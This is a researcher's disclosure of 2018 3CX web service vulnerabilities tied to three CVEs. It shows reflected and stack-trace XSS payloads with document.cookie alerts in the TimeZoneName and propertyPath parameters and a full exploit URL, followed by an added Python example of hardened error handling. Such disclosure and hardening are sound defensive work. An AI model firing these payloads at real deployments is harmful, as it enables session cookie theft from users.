Security Issues on 3cx Web Service

Some CVEs found by me and my bros in 2018, when I was a Jr.


Last updated 2 years ago

Me and my coworkers, Ricardo Fajin, Daniel Chactoura, Lucas Carmo and Kelvin Clark, found some issues in the famous PABX 3CX.

The issues Found:

  1. Multiple Improper error Handling

  2. Reflected Cross-Site Scripting

  3. Cross-Site Scripting on Stack Trace

1) Multiple Improper error Handling

While researching the application we found several traceback errors; the error below is one example. This can be especially dangerous because the traceback discloses several pieces of information about the server itself.

2) Reflected Cross-Site Scripting

Payload used: <img src=`%00`&NewLine; onerror=alert(document.cookie)&NewLine;

Parameter: TimeZoneName

3) Cross-Site Scripting on Stack Trace

URL: https://<ip>:5001/#/app/ivr_editor/4

Payload Used: <img src=`%00`&NewLine; onerror=alert(document.cookie)&NewLine;

Parameter: propertyPath

CVEs Related to this article:

CVE-2018-14905

CVE-2018-14906

CVE-2018-14907

[Figure: Evidence of the stack trace]

[Figure: Evidence of the reflected XSS]

[Figure: Evidence of the stack trace XSS 1]

[Figure: Evidence of the stack trace XSS 2]

URL (reflected XSS, parameter TimeZoneName): https://<IP>:<Port>/api/CallLog?TimeZoneName=<script>alert(document.cookie)</script>&callState=All&dateRangeType=Today&fromFilter=&fromFilterType=Any&numberOfRows=200&searchFilter=&startRow=0&toFilter=&toFilterType=Any
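
A hardened shape for the error handling behind issues 1 and 2, as an added example that is not 3CX's code and not part of the original write-up; the same pattern (no stack trace and no request value in the response) applies to the propertyPath case in issue 3. The handler name, `query_backend`, the character allow-list and the JSON error format are assumptions made for illustration.

```python
import json
import logging
import re
import uuid

log = logging.getLogger("calllog_example")

# Assumption: legitimate time zone names are short and use only these characters,
# e.g. "America/Sao_Paulo" or "E. South America Standard Time".
TZ_NAME = re.compile(r"[A-Za-z0-9 ._/+()-]{1,64}")

JSON_HEADERS = {
    "Content-Type": "application/json; charset=utf-8",
    "X-Content-Type-Options": "nosniff",  # stop browsers sniffing the body as HTML
}


def error_response(status, public_message, detail, exc_info=None):
    """Keep the detail in the server log; send a fixed message and a reference id."""
    ref = uuid.uuid4().hex
    log.error("ref=%s %s", ref, detail, exc_info=exc_info)
    return status, JSON_HEADERS, json.dumps({"error": public_message, "ref": ref})


def handle_call_log(params, query_backend):
    """Hypothetical handler for GET /api/CallLog; query_backend stands in for the lookup."""
    tz = params.get("TimeZoneName", "")
    if not TZ_NAME.fullmatch(tz):
        # repr() keeps control characters out of the log line; the value is never echoed.
        return error_response(400, "Invalid TimeZoneName", f"rejected TimeZoneName={tz!r}")
    try:
        rows = query_backend(tz)
    except Exception as exc:  # no traceback or exception text reaches the client
        return error_response(500, "Internal error", f"CallLog query failed: {exc!r}", exc_info=exc)
    return 200, JSON_HEADERS, json.dumps({"rows": rows})


if __name__ == "__main__":
    # Constructed requests: the value from the page's URL, then a well-formed name.
    for value in ("<script>alert(document.cookie)</script>", "America/Sao_Paulo"):
        status, _, body = handle_call_log({"TimeZoneName": value}, lambda tz: [])
        print(status, body)
```

The reference id lets support staff find the full traceback in the server log without the browser ever receiving it.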